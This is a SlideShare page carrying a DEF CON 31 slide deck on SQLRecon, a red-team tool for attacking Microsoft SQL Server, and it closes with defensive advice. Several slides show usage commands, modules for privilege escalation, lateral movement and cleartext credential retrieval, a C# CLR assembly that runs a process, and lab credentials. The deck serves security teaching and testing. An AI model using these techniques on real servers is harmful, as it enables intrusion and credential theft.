SlideShare a Scribd company logo

DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon

Sanjiv Kawa
Sanjiv Kawa

Video: https://youtu.be/LsYSePobFWA Conference: DEF CON 31 Presentation Title: Abusing Microsoft SQL Server with SQLRecon Presenter: Sanjiv Kawa

Technology
1 of 51
Abusing Microsoft SQL Server with SQLRecon Sanjiv Kawa IBM X-Force Red Adversary Services
2 Sanjiv Kawa Senior Managing Security Consultant, Adversary Services at IBM X-Force Red - Red Team Operator - Post-Exploitation Tooling Developer - github.com/xforcered/SQLRecon Intro @sanjivkawa github.com/skahwah IBM X-Force Red
3 Microsoft SQL Server Overview 2 min SQLRecon Overview 4 min 10 Demos! 20 min - Enumeration - Standard Modules - Attacking MS SQL Server with Low Privileges - Abusing MS SQL Impersonation - Attacking Linked MS SQL Servers - Attacking MS MECM / SCCM Databases Defensive Considerations 3 min Questions 5 min Agenda
4 Get Involved! Hack with me - Download the latest release of SQLRecon (v3.3) from github.com/skahwah/SQLRecon/releases - Spin up a Windows VM - Connect to SSID SQLRecon-Lab, don’t worry, it’s safe - Connection details will be provided before demo’s
5 Microsoft SQL Server Overview
6 Relational database which allows the storage and retrieval of data Deployed on-premise on top of Microsoft Server or in the cloud Used by businesses of all sizes, not just large enterprise networks Tightly integrated into Active Directory / Azure Active Directory MS SQL Server Overview
7 Why Attack MS SQL Server? Often overlooked Often misconfigured BUILTINUsers can connect to MS SQL Server by default, and: - Execute basic SQL commands - Determine privileges via user mapping/roles - UNC Path injection - Piggyback off rights to compromise linked SQL servers
8 SQLRecon Overview
9 What’s Currently Available? A good amount of offensive MS SQL Server tools already exist
10 How Did This Research Come About? Like most tooling … to solve a problem encountered on an engagement PowerShell is good, but C# is better when evading modern defensive controls Address the MS SQL Server C# post-exploitation tooling gap - Modernize the approach red teamers can take when facing MS SQL Server - Operational Security - Execution Guardrails - SQLRecon works with a diverse set of C2 frameworks - Fork & Run and In-Process compatible
11 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments:
12 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type SQLRecon.exe /Auth:WinToken
13 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01
14 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
15 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module Example: Enumerating databases on a remote MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
16 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module Example: Enumerating databases on a remote MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases Shortform command line arguments and case-insensitive SQLRecon.exe /a:wintoken /h:172.16.10.101 /m:databases
17 Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers: Authentication Type Example WinToken SQLRecon.exe /a:WinToken /h:host /m:module WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module Local SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module AzureAD SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module AzureLocal SQLRecon.exe /a:AzureLocal /u:user /p:pass /h:host /m:module
18 Module Overview SQLRecon has 83 different modules which can be used against MS SQL Server in a variety of scenarios. Listed below are modules that can facilitate with privilege escalation, lateral movement, or command execution: Module Privilege Escalation Lateral Movement Command Execution xp_cmdshell ✅ ✅ ✅ OLE Automation Procedures ✅ ✅ ✅ CLR Integration for Custom .NET Assemblies ✅ ✅ ✅ Agent Jobs ✅ ✅ ✅ Cleartext ADSI Credential Retrieval ✅ MECM / SCCM User Management ✅ Cleartext MECM / SCCM Credential Retrieval ✅
19 Demo Time
20 Get Involved! Rules - Don’t DoS the lab. We’re all here to learn together. - Don’t attack each other. We’re all here to learn together. - You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything
21 Get Involved! WiFi SSID: SQLRecon-Lab Password: DefconIsCancelled! Rules - Don’t DoS the lab. We’re all here to learn together. - Don’t attack each other. We’re all here to learn together. - You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything. Lab (kawalabs.local) DC01 172.16.10.100 SQL01 172.16.10.101 SQL02 172.16.10.102 SQL03 172.16.10.104 MECM01 172.16.10.103 ecom01.database.windows.net Test Connection String SQLRecon.exe /a:WinDomain /d:kawalabs /u:jsmith /p:Password123 /h:172.16.10.101 /m:whoami
22 Demo 1 Evaluating the current user’s permissions
23 Demo 1
24 Demo 2 Locating MS SQL Servers in AD via SPNs
25 Demo 2
26 Demo 3 Enumerating Azure MS SQL Server Database
27 Demo 3
28 Demo 4 Unprivileged UNC Path Injection
29 Demo 4
30 Demo 5 Operational Security and Execution Guardrails
31 Demo 5
32 Demo 6 Privilege Escalation: Abusing Impersonation BUILTINUsers can impersonate sa!
33 Demo 6 Privilege Escalation: Abusing Impersonation
34 Demo 6
35 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers SQL02 has an MS SQL Server link to SQL03
36 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers
37 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers - CLR Integration allows custom .NET assemblies to be imported into MS SQL Server - Assemblies get stored inside a SQL database Stored Procedure - You can then execute whatever is inside the custom assembly!
38 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers Basic Template: gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce Process Hollowing: gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410 // sql.cs // C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /target:library c:tempsql.cs using System; using System.Data; using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; using System.Diagnostics; public partial class StoredProcedures { [Microsoft.SqlServer.Server.SqlProcedure] public static void CustomFunctionName() { Process proc = new Process(); proc.StartInfo.FileName = "C:WindowsSystem32notepad.exe"; proc.Start(); } }
39 Demo 7
40 Demo 8 Credential Abuse: ADSI Double-Link Boomerang SQL03 has an ADSI link to DC01
41 Demo 8 Credential Abuse: ADSI Double-Link Boomerang
42 Demo 8
43 Demo 9 SCCM / MECM Enumeration
44 Demo 9
45 Demo 10 Privilege Escalation: MECM / SCCM
46 Demo 10
47 Defensive Considerations
48 Defensive Considerations Check out the Wiki for comprehensive Prevention, Detection and Mitigation guidance! github.com/xforcered/SQLRecon/wiki
49 Defensive Considerations Top 3 MS SQL Server Security Controls - Follow the Microsoft SQL Server best practices! - Consider removing or restricting the BUILTINUsers account and low privilege groups from authenticating against MS SQL Server instances - Evaluate impersonation and MS SQL Server links github.com/xforcered/SQLRecon/wiki
50 Questions or Comments? Thank You @xforcered github.com/xforcered/SQLRecon IBM X-Force Red github.com/skahwah @sanjivkawa
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon

Recommended

Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLReconBlack Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLReconSanjiv Kawa
 
Threat Hunting for Command and Control Activity
Threat Hunting for Command and Control ActivityThreat Hunting for Command and Control Activity
Threat Hunting for Command and Control ActivitySqrrl
 
Windows Operating System Archaeology
Windows Operating System ArchaeologyWindows Operating System Archaeology
Windows Operating System Archaeologyenigma0x3
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory PwnagePetros Koutroumpis
 
Building Business Service Intelligence with ITSI
Building Business Service Intelligence with ITSIBuilding Business Service Intelligence with ITSI
Building Business Service Intelligence with ITSISplunk
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Jhon the ripper
Jhon the ripper Jhon the ripper
Jhon the ripper Merve Karabudağ
 
ATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudMITRE ATT&CK
 

Recommended

Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLReconBlack Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLReconSanjiv Kawa
 
Threat Hunting for Command and Control Activity
Threat Hunting for Command and Control ActivityThreat Hunting for Command and Control Activity
Threat Hunting for Command and Control ActivitySqrrl
 
Windows Operating System Archaeology
Windows Operating System ArchaeologyWindows Operating System Archaeology
Windows Operating System Archaeologyenigma0x3
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory PwnagePetros Koutroumpis
 
Building Business Service Intelligence with ITSI
Building Business Service Intelligence with ITSIBuilding Business Service Intelligence with ITSI
Building Business Service Intelligence with ITSISplunk
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Jhon the ripper
Jhon the ripper Jhon the ripper
Jhon the ripper Merve Karabudağ
 
ATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudMITRE ATT&CK
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfTeymur Kheirkhabarov
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"Will Schroeder
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
Offensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetOffensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetRahmat Nurfauzi
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Nemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfNemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfWill Schroeder
 
Pursuing evasive custom command & control - GuideM
Pursuing evasive custom command & control - GuideMPursuing evasive custom command & control - GuideM
Pursuing evasive custom command & control - GuideMMark Secretario
 
Windows logging cheat sheet
Windows logging cheat sheetWindows logging cheat sheet
Windows logging cheat sheetMichael Gough
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...MITRE ATT&CK
 
Splunk workshop-Threat Hunting
Splunk workshop-Threat HuntingSplunk workshop-Threat Hunting
Splunk workshop-Threat HuntingSplunk
 
Finding attacks with these 6 events
Finding attacks with these 6 eventsFinding attacks with these 6 events
Finding attacks with these 6 eventsMichael Gough
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellBeau Bullock
 
Splunk for Enterprise Security featuring User Behavior Analytics
Splunk for Enterprise Security featuring User Behavior AnalyticsSplunk for Enterprise Security featuring User Behavior Analytics
Splunk for Enterprise Security featuring User Behavior AnalyticsSplunk
 
Bypass_AV-EDR.pdf
Bypass_AV-EDR.pdfBypass_AV-EDR.pdf
Bypass_AV-EDR.pdfFarouk2nd
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Hossam .M Hamed
 
Best Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationBest Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationAlienVault
 
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıWindows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıBGA Cyber Security
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAbhinav Nair
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQLScott Sutherland
 

More Related Content

What's hot

Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
Offensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetOffensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetRahmat Nurfauzi
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Nemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfNemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfWill Schroeder
 
Pursuing evasive custom command & control - GuideM
Pursuing evasive custom command & control - GuideMPursuing evasive custom command & control - GuideM
Pursuing evasive custom command & control - GuideMMark Secretario
 
Windows logging cheat sheet
Windows logging cheat sheetWindows logging cheat sheet
Windows logging cheat sheetMichael Gough
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...MITRE ATT&CK
 
Splunk workshop-Threat Hunting
Splunk workshop-Threat HuntingSplunk workshop-Threat Hunting
Splunk workshop-Threat HuntingSplunk
 
Finding attacks with these 6 events
Finding attacks with these 6 eventsFinding attacks with these 6 events
Finding attacks with these 6 eventsMichael Gough
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellBeau Bullock
 
Splunk for Enterprise Security featuring User Behavior Analytics
Splunk for Enterprise Security featuring User Behavior AnalyticsSplunk for Enterprise Security featuring User Behavior Analytics
Splunk for Enterprise Security featuring User Behavior AnalyticsSplunk
 
Bypass_AV-EDR.pdf
Bypass_AV-EDR.pdfBypass_AV-EDR.pdf
Bypass_AV-EDR.pdfFarouk2nd
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Hossam .M Hamed
 
Best Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationBest Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationAlienVault
 
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıWindows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıBGA Cyber Security
 

What's hot (20)

Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
Offensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetOffensive PowerShell Cheat Sheet
Offensive PowerShell Cheat Sheet
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Nemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfNemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdf
 
Pursuing evasive custom command & control - GuideM
Pursuing evasive custom command & control - GuideMPursuing evasive custom command & control - GuideM
Pursuing evasive custom command & control - GuideM
 
Windows logging cheat sheet
Windows logging cheat sheetWindows logging cheat sheet
Windows logging cheat sheet
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
 
Splunk workshop-Threat Hunting
Splunk workshop-Threat HuntingSplunk workshop-Threat Hunting
Splunk workshop-Threat Hunting
 
Finding attacks with these 6 events
Finding attacks with these 6 eventsFinding attacks with these 6 events
Finding attacks with these 6 events
 
Pwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
 
Splunk for Enterprise Security featuring User Behavior Analytics
Splunk for Enterprise Security featuring User Behavior AnalyticsSplunk for Enterprise Security featuring User Behavior Analytics
Splunk for Enterprise Security featuring User Behavior Analytics
 
Bypass_AV-EDR.pdf
Bypass_AV-EDR.pdfBypass_AV-EDR.pdf
Bypass_AV-EDR.pdf
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop
 
Best Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationBest Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM Installation
 
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıWindows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
 

Similar to DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon

2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQLScott Sutherland
 
Database Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David IzahkDatabase Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David Izahksqlserver.co.il
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)webhostingguy
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
 
Abusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLReconAbusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLReconSanjiv Kawa
 
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdfmohamedhayballa1
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationScott Sutherland
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012Scott Sutherland
 
MySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code ExtensionMySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code ExtensionFrederic Descamps
 
Ultimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitUltimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitKevin Kline
 
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 EditionEnter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 EditionMark Broadbent
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)Scott Sutherland
 
DevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityDevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityFrank Kim
 
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginnersSQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginnersTobias Koprowski
 
The Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET EcosystemThe Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET EcosystemJames Avery
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 

Similar to DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon (20)

SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
 
Database Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David IzahkDatabase Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David Izahk
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
SDC - Programming the CLR in SQL Server 2005.ppt (1.51 MB)
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
 
Abusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLReconAbusing MS SQL Using SQLRecon
Abusing MS SQL Using SQLRecon
 
Sql Sever Presentation.pptx
Sql Sever Presentation.pptxSql Sever Presentation.pptx
Sql Sever Presentation.pptx
 
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
61883659_WinCC_RuntimeAdv_access_SQL_via_script_DOCU_en (1).pdf
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
 
MySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code ExtensionMySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code Extension
 
Ultimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitUltimate Free SQL Server Toolkit
Ultimate Free SQL Server Toolkit
 
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 EditionEnter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
 
DevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityDevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise Security
 
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginnersSQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
 
SqlSa94
SqlSa94SqlSa94
SqlSa94
 
The Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET EcosystemThe Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET Ecosystem
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 

Recently uploaded

04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Install Stable Diffusion in windows machine
